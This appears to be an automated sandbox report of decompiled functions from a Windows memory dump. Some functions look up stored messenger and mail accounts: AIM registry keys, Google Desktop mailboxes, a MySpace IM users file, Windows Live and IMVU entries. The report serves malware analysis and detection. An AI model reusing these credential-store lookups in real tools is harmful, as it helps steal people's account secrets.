Opcode Fuzzy Hash: ac05d42046456b830cc0969aedd76e8629731d07fd3b456628963a844cb8144e
Instruction Fuzzy Hash: 67F06232D0E53167C9257F26B00158EA7646E46725315426FF8097B3D3CF3C6D8146EE

Uniqueness

Uniqueness Score: -1.00%

Function 00411B27, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00406B6F: memset.MSVCRT ref: 00406B8F
Part of subcall function 00406B6F: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406BA2
Part of subcall function 00406B6F: _strcmpi.MSVCRT ref: 00406BB4

SetBkMode.GDI32(?,00000001), ref: 00411B4E
GetSysColor.USER32(00000005), ref: 00411B56
SetBkColor.GDI32(?,00000000), ref: 00411B60
SetTextColor.GDI32(?,00C00000), ref: 00411B6E
GetSysColorBrush.USER32(00000005), ref: 00411B76

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Color$BrushClassModeNameText_strcmpimemset
String ID:
API String ID: 2775283111-0
Opcode ID: 4c6c90dc6369ed9def7ad49a685608b6b97007b198ef546a8f3c4911ca2b9476
Instruction ID: b9af807899647846139a12986955ac2cc84645abd360b6802fc8b760439410eb
Opcode Fuzzy Hash: 4c6c90dc6369ed9def7ad49a685608b6b97007b198ef546a8f3c4911ca2b9476
Instruction Fuzzy Hash: 92F03136104504FBDF112FA5EC09FDE3F25EF44721F10812AFA19951B1DB75A9A09B58

Uniqueness

Uniqueness Score: -1.00%

Function 00410AC5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC

GetFileSize.KERNEL32(00000000,00000000,MySpace\IM\users.txt,00000104,00000000,?,?,?,?,00410C45,?,00000000), ref: 00410AE7

Part of subcall function 00407A56: ??3@YAXPAX@Z.MSVCRT ref: 00407A5D
Part of subcall function 00407A56: ??2@YAPAXI@Z.MSVCRT ref: 00407A6B

Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,?,?,?,?,?,?,?,00410C45), ref: 00410B64

Part of subcall function 004108FA: memset.MSVCRT ref: 00410939

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00410C45,?,00000000), ref: 00410B78

Strings

MySpace\IM\users.txt, xrefs: 00410ACD

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: File$??2@??3@ByteCharCloseCreateHandleMultiReadSizeWidememset
String ID: MySpace\IM\users.txt
API String ID: 429556018-1720829597
Opcode ID: 9ecfc60a0865bdac6d3c577decf5946b40f4711ca6fbc71636231e6ee1035587
Instruction ID: 28eca0bbeff0950369e7ada1521615d79b3b69832f60dc8e7f5924118cda3e2e
Opcode Fuzzy Hash: 9ecfc60a0865bdac6d3c577decf5946b40f4711ca6fbc71636231e6ee1035587
Instruction Fuzzy Hash: 21217171C0424AEFCF00DFA9CC458DEBB74EF41328B158166E924772A1C634AA45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402834, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B

memset.MSVCRT ref: 00402873

Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11

RegCloseKey.ADVAPI32(?), ref: 004028C2
RegCloseKey.ADVAPI32(?), ref: 004028DF

Strings

Software\AIM\AIMPRO, xrefs: 00402841

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Close$EnumOpenmemset
String ID: Software\AIM\AIMPRO
API String ID: 2255314230-3527110354
Opcode ID: dded90e1ec05a9ac15428789d49d31d8fd58391a594f54d73697f6d07bfadf32
Instruction ID: 67585355273d4b01a1114a6cd89f6c97ebf6c1cbf8b7b4d496df69d3c229a794
Opcode Fuzzy Hash: dded90e1ec05a9ac15428789d49d31d8fd58391a594f54d73697f6d07bfadf32
Instruction Fuzzy Hash: 48115E76904118BADF21A792ED06FDE7B7CDF54304F0000B6AA44E1091EB756FD5DA64

Uniqueness

Uniqueness Score: -1.00%

Function 00407BC6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
registryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00407BC6(intOrPtr* _a4) {
				void* _v12;
				void* _v16;
				void _v271;
				char _v272;
				void** _t16;
				char* _t19;
				char* _t21;
				int _t26;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;

				_t16 =  &_v12;
				0x411d68(0x80000001, "Software\Google\Google Desktop\Mailboxes", _t16);
				_t29 = _t28 + 0xc;
				if(_t16 == 0) {
					_t26 = 0;
					_v272 = 0;
					memset( &_v271, 0, 0xff);
					_t30 = _t29 + 0xc;
					_t19 =  &_v272;
					0x411dee(_v12, 0, _t19);
					while(1) {
						_t31 = _t30 + 0xc;
						if(_t19 != 0) {
							break;
						}
						_t21 =  &_v272;
						0x411d68(_v12, _t21,  &_v16);
						_t30 = _t31 + 0xc;
						if(_t21 == 0) {
							E00407A93(_a4, _v16,  &_v272);
							RegCloseKey(_v16);
						}
						_t19 =  &_v272;
						_t26 = _t26 + 1;
						0x411dee(_v12, _t26, _t19);
					}
					return RegCloseKey(_v12);
				}
				return _t16;
			}

0x00407bd1
0x00407bdf
0x00407be4
0x00407be9
0x00407bf4
0x00407bfe
0x00407c05
0x00407c0a
0x00407c0d
0x00407c18
0x00407c67
0x00407c67
0x00407c6c
0x00000000
0x00000000
0x00407c29
0x00407c33
0x00407c38
0x00407c3d
0x00407c4c
0x00407c54
0x00407c54
0x00407c56
0x00407c5d
0x00407c62
0x00407c62
0x00000000
0x00407c71
0x00407c76

APIs

Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B

memset.MSVCRT ref: 00407C05

Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11

RegCloseKey.ADVAPI32(?), ref: 00407C54
RegCloseKey.ADVAPI32(?), ref: 00407C71

Strings

Software\Google\Google Desktop\Mailboxes, xrefs: 00407BD5

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Close$EnumOpenmemset
String ID: Software\Google\Google Desktop\Mailboxes
API String ID: 2255314230-2212045309
Opcode ID: b50ec71faf233748746677e360152f00ca846f408f6190e6d0fa9129bc25d888
Instruction ID: a9c93927ac610b6ef28ec82afd47bdb8c9c4627465144405bf34b6a811739c17
Opcode Fuzzy Hash: b50ec71faf233748746677e360152f00ca846f408f6190e6d0fa9129bc25d888
Instruction Fuzzy Hash: E9115EB6D04118BADF21AB91EC41FDEBB7CDF55304F0041B6BA04E1051E7756B94CEA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403BF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00403BF0(intOrPtr __ecx, void* __edx, void* __eflags, long long __fp0, void* _a4) {
				intOrPtr _v8;
				char _v272;
				void _v528;
				void _v536;
				char _v540;
				intOrPtr _v544;
				void* __edi;
				void* __esi;
				void* _t24;
				char* _t27;
				intOrPtr _t32;
				void* _t37;
				void* _t40;
				char* _t44;
				void* _t46;

				_v544 = __ecx;
				_v540 = 0x417ea8;
				E0040D77D( &_v528);
				memset( &_v536, 0, 0x214);
				_t24 = memcpy( &_v528, _a4, 0x82 << 2);
				0x413d62( &_v272,  &_v528, _t40, _t46);
				_pop(_t37);
				if(_t24 != 0) {
					_t44 =  &_v272;
					_v8 = E004037A2(_t44, __fp0);
					_t27 = _t44;
					0x413d74( &_v528);
					_t37 = _t27;
					if(_t27 == 0) {
						_t32 = 0xa;
						if(_v8 > _t32) {
							_v8 = _t32;
						}
					}
				} else {
					_v8 = 1;
				}
				E00409D21(_t37, _v544,  &_v540);
				return 1;
			}

0x00403c02
0x00403c06
0x00403c0e
0x00403c1f
0x00403c40
0x00403c42
0x00403c4a
0x00403c4b
0x00403c5a
0x00403c66
0x00403c72
0x00403c75
0x00403c7d
0x00403c7e
0x00403c82
0x00403c8a
0x00403c8c
0x00403c8c
0x00403c8a
0x00403c4d
0x00403c4d
0x00403c4d
0x00403c9c
0x00403ca9

APIs

memset.MSVCRT ref: 00403C1F
_mbscmp.MSVCRT ref: 00403C42
_mbsicmp.MSVCRT ref: 00403C75

Strings

:@, xrefs: 00403C06

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscmp_mbsicmpmemset
String ID: :@
API String ID: 1080945674-3074689909
Opcode ID: fc6b87c77e97942f29d542673130d1b31dda64e9daeb6a0660619c666916343b
Instruction ID: 05d51c46cf4b3144aa59074ae4edee5e5c3f47845a6acae635e5c8c721b5e64e
Opcode Fuzzy Hash: fc6b87c77e97942f29d542673130d1b31dda64e9daeb6a0660619c666916343b
Instruction Fuzzy Hash: 9911867250C3459AD720EEA5E809BDB77DCEB84315F004D3FF594E3181E7749609879A

Uniqueness

Uniqueness Score: -1.00%

Function 0041051F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 0041053E

Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD18
Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD21

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00410570
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00410587

Strings

windowslive:name=, xrefs: 00410533

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ByteCharMultiWidememset$_wcsnicmp
String ID: windowslive:name=
API String ID: 947294041-3311407311
Opcode ID: fd4d89018f6d8f297b5807dfdb0caed421d73eceed85ab27545bd491571ae371
Instruction ID: aaacd06d763df2f40df435721f5dd751edfa9d120b015f6101ff871e9026a9e8
Opcode Fuzzy Hash: fd4d89018f6d8f297b5807dfdb0caed421d73eceed85ab27545bd491571ae371
Instruction Fuzzy Hash: A80184B6604209BFD710DF59DC84DD77BECEB49364F10462ABA28D72A1D630DD04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040F2E1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040F325
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040F339
_wcsnicmp.MSVCRT ref: 0040F347

Strings

http://www.imvu.com, xrefs: 0040F33F

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ByteCharMultiWide$_wcsnicmp
String ID: http://www.imvu.com
API String ID: 1082246498-3717390816
Opcode ID: d858862f83375720269192bc115d82f05b3495ae824a477da88cd8a016989edf
Instruction ID: a621eff572e40bce3e368aabcc4a0ad2a08d37bae4b59898fbad6a548f86f146
Opcode Fuzzy Hash: d858862f83375720269192bc115d82f05b3495ae824a477da88cd8a016989edf
Instruction Fuzzy Hash: CD1152B2544349AED7309E599C84EEB7FACEB89364F10062EB96892191D7305A14C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 00410894, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 004108AE
memcpy.MSVCRT ref: 004108C0
DialogBoxParamA.USER32(0000006B,?,Function_000105A6,00000000), ref: 004108E4

Strings

;4, xrefs: 004108C0

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpy$DialogParam
String ID: ;4
API String ID: 392721444-4181167889
Opcode ID: c5f1268ccc674415783c8697f9a32e79e000757815ba7d6e947a1f9e053f7934
Instruction ID: 2aaa1d25541d53f243854b8b99eb4e9492d8e88977a0f1258d463d5600498ee3
Opcode Fuzzy Hash: c5f1268ccc674415783c8697f9a32e79e000757815ba7d6e947a1f9e053f7934
Instruction Fuzzy Hash: 86F0A771A44730BBF7216F55BC06BC67A91AB08B06F218036F545A51D0C3B925D08FDC

Uniqueness

Uniqueness Score: -1.00%

Function 00406B6F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00406B6F(struct HWND__* _a4) {
				void _v259;
				char _v260;
				signed int _t10;

				_v260 = 0;
				memset( &_v259, 0, 0xff);
				GetClassNameA(_a4,  &_v260, 0xff);
				_t10 =  &_v260;
				0x413dce(_t10, "edit");
				asm("sbb eax, eax");
				return  ~_t10 + 1;
			}

0x00406b88
0x00406b8f
0x00406ba2
0x00406ba8
0x00406bb4
0x00406bbd
0x00406bc2

APIs

memset.MSVCRT ref: 00406B8F
GetClassNameA.USER32(?,00000000,000000FF), ref: 00406BA2
_strcmpi.MSVCRT ref: 00406BB4

Strings

edit, xrefs: 00406BAE

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ClassName_strcmpimemset
String ID: edit
API String ID: 275601554-2167791130
Opcode ID: 1fc934d62d77a70a9e396aa4a7c9eacbfe567db38c0b85652fff254433e2e45d
Instruction ID: aca7036e1f85a757735cd09c7bf6aa39e2ce89dfda263754777898d954571a1f
Opcode Fuzzy Hash: 1fc934d62d77a70a9e396aa4a7c9eacbfe567db38c0b85652fff254433e2e45d
Instruction Fuzzy Hash: 61E09BB3C5012A6ADB11AA64EC05FE5376C9F54705F0001F6B949E2081E5B457C44B94

Uniqueness

Uniqueness Score: -1.00%

Function 00401085, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401085(void* __edi) {
				struct tagLOGFONTA _v64;
				int* _t12;

				E00406A19( &_v64, "MS Sans Serif", 0xa, 1);
				_t12 = __edi + 0x20c;
				 *_t12 = CreateFontIndirectA( &_v64);
				return SendMessageA(GetDlgItem( *(__edi + 4), 0x3ec), 0x30,  *_t12, 0);
			}

0x00401098
0x004010a4
0x004010b8
0x004010cf

APIs

Part of subcall function 00406A19: memset.MSVCRT ref: 00406A23
Part of subcall function 00406A19: _mbscpy.MSVCRT ref: 00406A63

CreateFontIndirectA.GDI32(?), ref: 004010AA
GetDlgItem.USER32(?,000003EC), ref: 004010BA
SendMessageA.USER32(00000000,00000030,?,00000000), ref: 004010C7

Strings

MS Sans Serif, xrefs: 00401090

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: CreateFontIndirectItemMessageSend_mbscpymemset
String ID: MS Sans Serif
API String ID: 2650341901-168460110
Opcode ID: e4ca45643e333f1720333046815af32c43876757aaae09a92ca8bc646b2ccae1
Instruction ID: 5c9505941c48c8dd7a2399cb1aaf590a0077e647136f214fd0fe6491ebdd60b9
Opcode Fuzzy Hash: e4ca45643e333f1720333046815af32c43876757aaae09a92ca8bc646b2ccae1
Instruction Fuzzy Hash: 67E06D71A40604FBCB116BA0EC0AFCABB6CAB44700F108125FA51B60E1D7B0A114CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00412192, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(shell32.dll,00412251,00000000,00000104), ref: 004121A0
GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004121B5

Strings

shell32.dll, xrefs: 0041219B
SHGetSpecialFolderPathA, xrefs: 004121AF

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetSpecialFolderPathA$shell32.dll
API String ID: 2574300362-543337301
Opcode ID: 65bafe7a062dc340e9a6b521779d20cd872f84261b23a2d66ef8095fb01f6124
Instruction ID: a03a44e40ad870f41b9c2d8f2e6b277420dcc77a40eb9148cfb32e265f33a348
Opcode Fuzzy Hash: 65bafe7a062dc340e9a6b521779d20cd872f84261b23a2d66ef8095fb01f6124
Instruction Fuzzy Hash: 2ED0C978A00302EBEB20DF61BD597D63FA8A74C711F20C036F905D2262DBB865D0CA2C

Uniqueness

Uniqueness Score: -1.00%

Function 00412D65, Relevance: 6.3, APIs: 5, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 00406D91: memset.MSVCRT ref: 00406D9F

??2@YAPAXI@Z.MSVCRT ref: 00412D7A
??2@YAPAXI@Z.MSVCRT ref: 00412D98
??2@YAPAXI@Z.MSVCRT ref: 00412DB3
??2@YAPAXI@Z.MSVCRT ref: 00412DDC
??2@YAPAXI@Z.MSVCRT ref: 00412E00

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: cefea47da0d948a8b2b7f14bfbe4bf7bfbc63bea052a784fe90b9effbb1e0511
Instruction ID: 077d2ad6405c458e4821e20ddf5ab0b81a66c3d9f88b424bd3f36c9f492752c9
Opcode Fuzzy Hash: cefea47da0d948a8b2b7f14bfbe4bf7bfbc63bea052a784fe90b9effbb1e0511
Instruction Fuzzy Hash: F0310AB4A007008FDB609F2AD945692FBF4FF84305F25886FD549CB262D7B8D491CB19

Uniqueness

Uniqueness Score: -1.00%

Function 004116A9, Relevance: 6.3, APIs: 5, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 004116B5
_strcmpi.MSVCRT ref: 004116C4
strchr.MSVCRT ref: 004116D5
memset.MSVCRT ref: 00411701

Part of subcall function 00406A87: _mbscpy.MSVCRT ref: 00406A91
Part of subcall function 00406A87: strrchr.MSVCRT ref: 00406A9C

_strcmpi.MSVCRT ref: 0041171D

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _strcmpistrchr$_mbscpymemsetstrrchr
String ID:
API String ID: 274398480-0
Opcode ID: 8152aa6171c4159ef6465b31656666253e18c95892931f65106702393bd21b79
Instruction ID: 328b4c9133cd54f2635944cbca80cb08cea31e8af7c0159c33255436c65d5f23
Opcode Fuzzy Hash: 8152aa6171c4159ef6465b31656666253e18c95892931f65106702393bd21b79
Instruction Fuzzy Hash: C601D6756082087AEB20BB72DC03FCB3B9C8F1175AF10005FF689A50D1EEA8D6C146AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9C7, Relevance: 6.3, APIs: 5, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C9C7(void* __edi, void* __esi, void* _a4) {
				signed int _t13;
				signed int _t25;
				int _t26;
				char* _t30;
				void* _t31;
				void* _t33;
				void* _t35;

				_t35 = __esi;
				_t25 = 0x3f;
				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
				_t30 = __esi + 0x18 + _t13;
				 *_t30 = 0x80;
				_t26 = _t25 - _t13;
				_t31 = _t30 + 1;
				if(_t26 >= 8) {
					memset(_t31, 0, _t26 + 0xfffffff8);
				} else {
					memset(_t31, 0, _t26);
					_t33 = __esi + 0x18;
					E0040CA46(_t33, __esi);
					memset(_t33, 0, 0x38);
				}
				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
				E0040CA46(_t35 + 0x18, _t35);
				memcpy(_a4, _t35, 0x10);
				return memset(_t35, 0, 4);
			}

0x0040c9c7
0x0040c9cf
0x0040c9d0
0x0040c9d2
0x0040c9d6
0x0040c9d9
0x0040c9db
0x0040c9df
0x0040ca0e
0x0040c9e1
0x0040c9e6
0x0040c9eb
0x0040c9f2
0x0040c9fc
0x0040ca04
0x0040ca19
0x0040ca1f
0x0040ca27
0x0040ca33
0x0040ca45

APIs

memset.MSVCRT ref: 0040C9E6
memset.MSVCRT ref: 0040C9FC
memset.MSVCRT ref: 0040CA0E
memcpy.MSVCRT ref: 0040CA33
memset.MSVCRT ref: 0040CA3D

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: db955d66aa391fc484fd506110ad959e30d2163aa55218731a18cbda7d247bce
Instruction ID: 72ff1d110960cc82dd2bfc388b685e2dd0a1937d99bf851f24f672c8116534dd
Opcode Fuzzy Hash: db955d66aa391fc484fd506110ad959e30d2163aa55218731a18cbda7d247bce
Instruction Fuzzy Hash: 4C0128B1740B00B6D231EF29DC43F6A7BA49F91B18F100B1EF1526A6C1E7B8B244865D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE7D, Relevance: 6.1, APIs: 4, Instructions: 114
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040AE7D(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				signed int _t63;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t79;
				void* _t84;
				signed int _t86;
				signed int _t87;
				char* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t106;
				void* _t107;

				_t84 = __eax;
				E0040972B(__eax, __eflags);
				_t86 = 0;
				_v12 = 0;
				while(1) {
					_t98 = _a4;
					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
						break;
					}
					_t86 = _t86 + 1;
					if(_t86 < 1) {
						continue;
					}
					if(strlen(_t98) >= 3) {
						break;
					}
					_t79 = atoi(_a4);
					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
					}
					L21:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t87 =  *0x41e394; // 0x1
					_t63 = _v12;
					 *0x41e394 =  *0x41e394 + 1;
					 *((intOrPtr*)(0x41e398 + _t87 * 4)) = _t63;
					return _t63;
				}
				_t104 = 0;
				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
					L14:
					_t100 = 0;
					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
					_v8 = 0;
					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
						L20:
						goto L21;
					}
					_t106 = 0;
					__eflags = 0;
					do {
						_v20 = E00407139(0, _a4);
						_t67 = E00407139(0, _a4);
						__eflags = _v20;
						if(_v20 >= 0) {
							L18:
							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
							goto L19;
						}
						__eflags = _t67;
						if(_t67 < 0) {
							goto L19;
						}
						goto L18;
						L19:
						_v8 = _v8 + 1;
						_t100 = _t100 + 0x10;
						_t106 = _t106 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
					goto L20;
				}
				_t102 = 0;
				__eflags = 0;
				do {
					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
					0x413d74(_t72, _a4);
					_v20 = _t72;
					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
					0x413d74(_t74, _a4);
					_t107 = _t107 + 0x10;
					__eflags = _v20;
					if(_v20 == 0) {
						L11:
						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t102 = _t102 + 0x10;
					_t104 = _t104 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L20;
				}
				goto L14;
			}

0x0040ae84
0x0040ae86
0x0040ae8b
0x0040ae8d
0x0040ae90
0x0040ae90
0x0040ae9a
0x00000000
0x00000000
0x0040ae9c
0x0040aea0
0x00000000
0x00000000
0x0040aeac
0x00000000
0x00000000
0x0040aeb1
0x0040aeb9
0x0040aeda
0x0040aeda
0x0040afbb
0x0040afc0
0x0040afc2
0x0040afc2
0x0040afc9
0x0040afcf
0x0040afd2
0x0040afd8
0x0040afe0
0x0040afe0
0x0040aee3
0x0040aee5
0x0040aeec
0x0040aeef
0x0040aef2
0x0040af56
0x0040af56
0x0040af58
0x0040af5e
0x0040af61
0x0040afb9
0x00000000
0x0040afba
0x0040af63
0x0040af63
0x0040af65
0x0040af83
0x0040af88
0x0040af8d
0x0040af93
0x0040af99
0x0040afa2
0x00000000
0x0040afa2
0x0040af95
0x0040af97
0x00000000
0x00000000
0x00000000
0x0040afa5
0x0040afa5
0x0040afab
0x0040afae
0x0040afb1
0x0040afb1
0x00000000
0x0040af65
0x0040aef4
0x0040aef4
0x0040aef6
0x0040aefc
0x0040af04
0x0040af0c
0x0040af12
0x0040af17
0x0040af1c
0x0040af1f
0x0040af23
0x0040af29
0x0040af32
0x0040af35
0x00000000
0x0040af35
0x0040af25
0x0040af27
0x00000000
0x00000000
0x00000000
0x0040af3c
0x0040af3c
0x0040af42
0x0040af45
0x0040af48
0x0040af48
0x0040af50
0x0040af54
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 0040972B: ??2@YAPAXI@Z.MSVCRT ref: 0040974C
Part of subcall function 0040972B: ??3@YAXPAX@Z.MSVCRT ref: 00409813

strlen.MSVCRT ref: 0040AEA3
atoi.MSVCRT ref: 0040AEB1
_mbsicmp.MSVCRT ref: 0040AF04
_mbsicmp.MSVCRT ref: 0040AF17

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbsicmp$??2@??3@atoistrlen
String ID:
API String ID: 4107816708-0
Opcode ID: 3a59e25db7847bfcb7a2cf7fa4c60edbf2d33e4cde8c95d2bbbe957afd87409f
Instruction ID: 08bf478f3eb11018bf028c01ffb7f168253fa3ae9792e106a9a4f60ade7b3b20
Opcode Fuzzy Hash: 3a59e25db7847bfcb7a2cf7fa4c60edbf2d33e4cde8c95d2bbbe957afd87409f
Instruction Fuzzy Hash: B8414975900305EFCB11DF69D580A9ABBF4FB48308F1084BAEC15AB392D778DA51CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00413646, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00413653

Strings

>, xrefs: 0041368E
>, xrefs: 00413679
>, xrefs: 004136B4

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen
String ID: >$>$>
API String ID: 39653677-3911187716
